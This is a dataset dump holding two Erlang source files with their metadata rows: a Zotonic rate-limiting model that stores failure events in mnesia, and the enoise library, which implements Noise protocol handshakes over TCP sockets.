-export([
m_get/3,
init/1,
insert_event/4,
insert_event/5,
is_event_limited/4,
list_event/3,
delete_event/3,
prune/1
]).
-include_lib("zotonic_core/include/zotonic.hrl").
-include_lib("stdlib/include/qlc.hrl").
-type device_id() :: binary() | undefined.
% Failure event for the given key/device.
-record(ratelimit_event, {
key :: {atom(), binary()},
device :: device_id(),
timestamp :: pos_integer(),
props :: proplists:proplist()
}).
% Default period for counting events
-define(RATELIMIT_T, 3600).
% Default number of event before restriction
-define(RATELIMIT_N, 5).
m_get([ <<"timeout">> | Rest ], _Msg, Context) ->
{ok, {ratelimit_t(Context), Rest}}.
%% @doc Insert an event, use the context for extra properties.
-spec insert_event( atom(), binary(), device_id(), z:context() ) -> ok | {error, term()}.
insert_event(Type, Key, Device, Context) ->
Props = [
{peer, m_req:get(peer, Context)},
{user_agent, m_req:get(user_agent, Context)}
],
insert_event(Type, Key, Device, Props, Context).
%% @doc Insert an event, with extra properties.
-spec insert_event( atom(), binary(), device_id(), proplists:proplist(), z:context() ) -> ok.
insert_event(Type, Key, Device, Props, Context) ->
Event = #ratelimit_event{
key = {Type, Key},
device = Device,
timestamp = z_datetime:timestamp(),
props = Props
},
case mnesia:transaction( fun() -> mnesia:write(event_table(Context), Event, write) end ) of
{atomic, _} -> ok;
{aborted, Reason} -> {error, Reason}
end.
%% @doc Check if the key/device is rate limited due to previous events.
-spec is_event_limited( atom(), binary(), device_id(), z:context() ) -> boolean().
is_event_limited( Type, Key, Device, Context ) ->
T = z_datetime:timestamp() - ratelimit_t(Context),
List = mnesia:dirty_read( event_table(Context), {Type, Key} ),
Filtered = lists:filter(
fun(R) ->
R#ratelimit_event.device =:= Device
andalso R#ratelimit_event.timestamp >= T
end,
List),
length(Filtered) >= ratelimit_n(Context).
%% @doc Return all entries for an event
-spec list_event( atom(), binary(), z:context() ) -> list().
list_event(Type, Key, Context) ->
mnesia:dirty_read( event_table(Context), {Type, Key} ).
%% @doc Delete all entries for an event
-spec delete_event( atom(), binary(), z:context() ) -> ok.
delete_event(Type, Key, Context) ->
{atomic, _} = mnesia:transaction(
fun() ->
mnesia:delete({ event_table(Context), {Type, Key}})
end),
ok.
-spec init( z:context() ) -> ok.
init(Context) ->
TabName = event_table(Context),
TabDef = [
{type, bag},
{record_name, ratelimit_event},
{attributes, record_info(fields, ratelimit_event)}
| case application:get_env(mnesia, dir) of
{ok, _} -> [ {disc_copies, [node()]} ];
undefined -> []
end
],
case mnesia:create_table(TabName, TabDef) of
{atomic, ok} -> ok;
{aborted, {already_exists, TabName}} -> ok
end.
-spec ratelimit_t( z:context() ) -> integer().
ratelimit_t(Context) ->
case m_config:get_value(mod_ratelimit, event_period, Context) of
<<>> -> ?RATELIMIT_T;
undefined -> ?RATELIMIT_T;
T -> z_convert:to_integer(T)
end.
-spec ratelimit_n( z:context() ) -> integer().
ratelimit_n(Context) ->
case m_config:get_value(mod_ratelimit, event_count, Context) of
<<>> -> ?RATELIMIT_N;
undefined -> ?RATELIMIT_N;
N -> z_convert:to_integer(N)
end.
-spec prune(z:context()) -> ok.
prune(Context) ->
Table = event_table(Context),
Oldest = z_datetime:timestamp() - ratelimit_t(Context) - 1,
PruneFun = fun() ->
Query = qlc:q([ Ev || Ev <- mnesia:table(Table), Ev#ratelimit_event.timestamp < Oldest ]),
lists:foreach(
fun(Ev) -> mnesia:delete_object(Table, Ev, write) end,
qlc:e(Query))
end,
{atomic, _} = mnesia:transaction(PruneFun),
ok.
event_table(Context) ->
list_to_atom("ratelimit_event-" ++ z_convert:to_list(z_context:site(Context))). | apps/zotonic_mod_ratelimit/src/models/m_ratelimit.erl | 0.611382 | 0.435301 | m_ratelimit.erl | starcoder |
%%% ------------------------------------------------------------------
%%% @copyright 2018, <NAME>
%%%
%%% @doc Module is an interface to the Noise protocol
%%% [https://noiseprotocol.org]
%%%
%%% The module implements Noise handshake in `handshake/3'.
%%%
%%% For convenience there is also an API to use Noise over TCP (i.e. `gen_tcp')
%%% and after "upgrading" a `gen_tcp'-socket into a `enoise'-socket it has a
%%% similar API as `gen_tcp'.
%%%
%%% @end ------------------------------------------------------------------
-module(enoise).
%% Main function with generic Noise handshake
-export([handshake/2, handshake/3, step_handshake/2]).
%% API exports - Mainly mimicing gen_tcp
-export([ accept/2
, close/1
, connect/2
, controlling_process/2
, send/2
, set_active/2 ]).
-record(enoise, { pid }).
-type noise_key() :: binary().
-type noise_keypair() :: enoise_keypair:keypair().
-type noise_options() :: [noise_option()].
%% A list of Noise options is a proplist, it *must* contain a value `noise'
%% that describes which Noise configuration to use. It is possible to give a
%% `prologue' to the protocol. And for the protocol to work, the correct
%% configuration of pre-defined keys (`s', `e', `rs', `re') should also be
%% provided.
-type noise_option() :: {noise, noise_protocol_option()} %% Required
| {e, noise_keypair()} %% Mandatary depending on `noise'
| {s, noise_keypair()}
| {re, noise_key()}
| {rs, noise_key()}
| {prologue, binary()} %% Optional
| {timeout, integer() | infinity}. %% Optional
-type noise_protocol_option() :: enoise_protocol:protocol() | string() |
binary().
%% Either an instantiated Noise protocol configuration or the name of a Noise
%% configuration (either as a string or a binary string).
-type com_state_state() :: term().
%% The state part of a communiction state
-type recv_msg_fun() :: fun((com_state_state(), integer() | infinity) ->
{ok, binary(), com_state_state()} | {error, term()}).
%% Function that receive a message
-type send_msg_fun() :: fun((com_state_state(), binary()) -> ok).
%% Function that sends a message
-type noise_com_state() :: #{ recv_msg := recv_msg_fun(),
send_msg := send_msg_fun(),
state := term() }.
%% Noise communication state - used to parameterize a handshake. Consists of a
%% send function, one receive function, and an internal state.
-type noise_split_state() :: enoise_hs_state:noise_split_state().
%% Return value from the final `split' operation. Provides a CipherState for
%% receiving and a CipherState transmission. Also includes the final handshake
%% hash for channel binding.
-opaque noise_socket() :: #enoise{}.
%% An abstract Noise socket - holds a reference to a socket that has completed
%% a Noise handshake.
-export_type([noise_socket/0]).
%%====================================================================
%% API functions
%%====================================================================
%% @doc Start an interactive handshake
%% @end
-spec handshake(Options :: noise_options(),
Role :: enoise_hs_state:noise_role()) ->
{ok, enoise_hs_state:state()} | {error, term()}.
handshake(Options, Role) ->
HState = create_hstate(Options, Role),
{ok, HState}.
%% @doc Do a step (either `{send, Payload}', `{rcvd, EncryptedData}',
%% or `done')
%% @end
-spec step_handshake(HState :: enoise_hs_state:state(),
Data :: {rcvd, binary()} | {send, binary()}) ->
{ok, send, binary(), enoise_hs_state:state()}
| {ok, rcvd, binary(), enoise_hs_state:state()}
| {ok, done, noise_split_state()}
| {error, term()}.
step_handshake(HState, Data) ->
do_step_handshake(HState, Data).
%% @doc Perform a Noise handshake
%% @end
-spec handshake(Options :: noise_options(),
Role :: enoise_hs_state:noise_role(),
ComState :: noise_com_state()) ->
{ok, noise_split_state(), noise_com_state()} | {error, term()}.
handshake(Options, Role, ComState) ->
HState = create_hstate(Options, Role),
Timeout = proplists:get_value(timeout, Options, infinity),
do_handshake(HState, ComState, Timeout).
%% @doc Upgrades a gen_tcp, or equivalent, connected socket to a Noise socket,
%% that is, performs the client-side noise handshake.
%%
%% Note: The TCP socket has to be in mode `{active, true}' or `{active, once}',
%% passive receive is not supported.
%%
%% {@link noise_options()} is a proplist.
%% @end
-spec connect(TcpSock :: gen_tcp:socket(),
Options :: noise_options()) ->
{ok, noise_socket(), enoise_hs_state:state()} | {error, term()}.
connect(TcpSock, Options) ->
tcp_handshake(TcpSock, initiator, Options).
%% @doc Upgrades a gen_tcp, or equivalent, connected socket to a Noise socket,
%% that is, performs the server-side noise handshake.
%%
%% Note: The TCP socket has to be in mode `{active, true}' or `{active, once}',
%% passive receive is not supported.
%%
%% {@link noise_options()} is a proplist.
%% @end
-spec accept(TcpSock :: gen_tcp:socket(),
Options :: noise_options()) ->
{ok, noise_socket(), enoise_hs_state:state()} | {error, term()}.
accept(TcpSock, Options) ->
tcp_handshake(TcpSock, responder, Options).
%% @doc Writes `Data' to `Socket'
%% @end
-spec send(Socket :: noise_socket(), Data :: binary()) -> ok | {error, term()}.
send(#enoise{ pid = Pid }, Data) ->
enoise_connection:send(Pid, Data).
%% @doc Closes a Noise connection.
%% @end
-spec close(NoiseSock :: noise_socket()) -> ok | {error, term()}.
close(#enoise{ pid = Pid }) ->
enoise_connection:close(Pid).
%% @doc Assigns a new controlling process to the Noise socket. A controlling
%% process is the owner of an Noise socket, and receives all messages from the
%% socket.
%% @end
-spec controlling_process(Socket :: noise_socket(), Pid :: pid()) ->
ok | {error, term()}.
controlling_process(#enoise{ pid = Pid }, NewPid) ->
enoise_connection:controlling_process(Pid, NewPid).
%% @doc Set the active option `true | once'. Note that `N' and `false' are
%% not valid options for a Noise socket.
%% @end
-spec set_active(Socket :: noise_socket(), Mode :: true | once) ->
ok | {error, term()}.
set_active(#enoise{ pid = Pid }, ActiveMode) ->
enoise_connection:set_active(Pid, ActiveMode).
%%====================================================================
%% Internal functions
%%====================================================================
do_handshake(HState, ComState, Timeout) ->
case enoise_hs_state:next_message(HState) of
in ->
case hs_recv_msg(ComState, Timeout) of
{ok, Data, ComState1} ->
case enoise_hs_state:read_message(HState, Data) of
{ok, HState1, _Msg} ->
do_handshake(HState1, ComState1, Timeout);
Err = {error, _} ->
Err
end;
Err = {error, _} ->
Err
end;
out ->
{ok, HState1, Msg} = enoise_hs_state:write_message(HState, <<>>),
case hs_send_msg(ComState, Msg) of
{ok, ComState1} ->
do_handshake(HState1, ComState1, Timeout);
Err = {error, _} ->
Err
end;
done ->
{ok, Res} = enoise_hs_state:finalize(HState),
{ok, Res, ComState}
end.
hs_recv_msg(CS = #{ recv_msg := Recv, state := S }, Timeout) ->
case Recv(S, Timeout) of
{ok, Data, S1} -> {ok, Data, CS#{ state := S1 }};
Err = {error, _} -> Err
end.
hs_send_msg(CS = #{ send_msg := Send, state := S }, Data) ->
case Send(S, Data) of
{ok, S1} -> {ok, CS#{ state := S1 }};
Err = {error, _} -> Err
end.
do_step_handshake(HState, Data) ->
case {enoise_hs_state:next_message(HState), Data} of
{in, {rcvd, Encrypted}} ->
case enoise_hs_state:read_message(HState, Encrypted) of
{ok, HState1, Msg} ->
{ok, rcvd, Msg, HState1};
Err = {error, _} ->
Err
end;
{out, {send, Payload}} ->
{ok, HState1, Msg} = enoise_hs_state:write_message(HState, Payload),
{ok, send, Msg, HState1};
{done, done} ->
{ok, Res} = enoise_hs_state:finalize(HState),
{ok, done, Res};
{Next, _} ->
{error, {invalid_step, expected, Next, got, Data}}
end.
%% -- gen_tcp specific functions ---------------------------------------------
tcp_handshake(TcpSock, Role, Options) ->
case check_gen_tcp(TcpSock) of
ok ->
case inet:getopts(TcpSock, [active]) of
{ok, [{active, Active}]} ->
do_tcp_handshake(Options, Role, TcpSock, Active);
Err = {error, _} ->
Err
end;
Err = {error, _} ->
Err
end.
do_tcp_handshake(Options, Role, TcpSock, Active) ->
ComState = #{ recv_msg => fun gen_tcp_rcv_msg/2,
send_msg => fun gen_tcp_snd_msg/2,
state => {TcpSock, Active, <<>>} },
case handshake(Options, Role, ComState) of
{ok, #{ rx := Rx, tx := Tx, final_state := FState }, #{ state := {_, _, Buf} }} ->
case enoise_connection:start_link(TcpSock, Rx, Tx, self(), {Active, Buf}) of
{ok, Pid} -> {ok, #enoise{ pid = Pid }, FState};
Err = {error, _} -> Err
end;
Err = {error, _} ->
Err
end.
create_hstate(Options, Role) ->
Prologue = proplists:get_value(prologue, Options, <<>>),
NoiseProtocol0 = proplists:get_value(noise, Options),
NoiseProtocol =
case NoiseProtocol0 of
X when is_binary(X); is_list(X) ->
enoise_protocol:from_name(X);
_ -> NoiseProtocol0
end,
S = proplists:get_value(s, Options, undefined),
E = proplists:get_value(e, Options, undefined),
RS = proplists:get_value(rs, Options, undefined),
RE = proplists:get_value(re, Options, undefined),
enoise_hs_state:init(NoiseProtocol, Role,
Prologue, {S, E, RS, RE}).
check_gen_tcp(TcpSock) ->
case inet:getopts(TcpSock, [mode, packet, active, header, packet_size]) of
{ok, TcpOpts} ->
Packet = proplists:get_value(packet, TcpOpts, 0),
Active = proplists:get_value(active, TcpOpts, 0),
Header = proplists:get_value(header, TcpOpts, 0),
PSize = proplists:get_value(packet_size, TcpOpts, undefined),
Mode = proplists:get_value(mode, TcpOpts, binary),
case (Packet == 0 orelse Packet == raw)
andalso (Active == true orelse Active == once)
andalso Header == 0 andalso PSize == 0 andalso Mode == binary of
true ->
gen_tcp:controlling_process(TcpSock, self());
false ->
{error, {invalid_tcp_options, TcpOpts}}
end;
Err = {error, _} ->
Err
end.
gen_tcp_snd_msg(S = {TcpSock, _, _}, Msg) ->
Len = byte_size(Msg),
case gen_tcp:send(TcpSock, <<Len:16, Msg/binary>>) of
ok -> {ok, S};
Err = {error, _} -> Err
end.
gen_tcp_rcv_msg({TcpSock, Active, Buf}, Timeout) ->
receive {tcp, TcpSock, Data} ->
%% Immediately re-set {active, once}
[ inet:setopts(TcpSock, [{active, once}]) || Active == once ],
case <<Buf/binary, Data/binary>> of
Buf1 = <<Len:16, Rest/binary>> when byte_size(Rest) < Len ->
gen_tcp_rcv_msg({TcpSock, true, Buf1}, Timeout);
<<Len:16, Rest/binary>> ->
<<Data1:Len/binary, Buf1/binary>> = Rest,
{ok, Data1, {TcpSock, true, Buf1}}
end
after Timeout ->
{error, timeout}
end. | src/enoise.erl | 0.571169 | 0.438364 | enoise.erl | starcoder |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.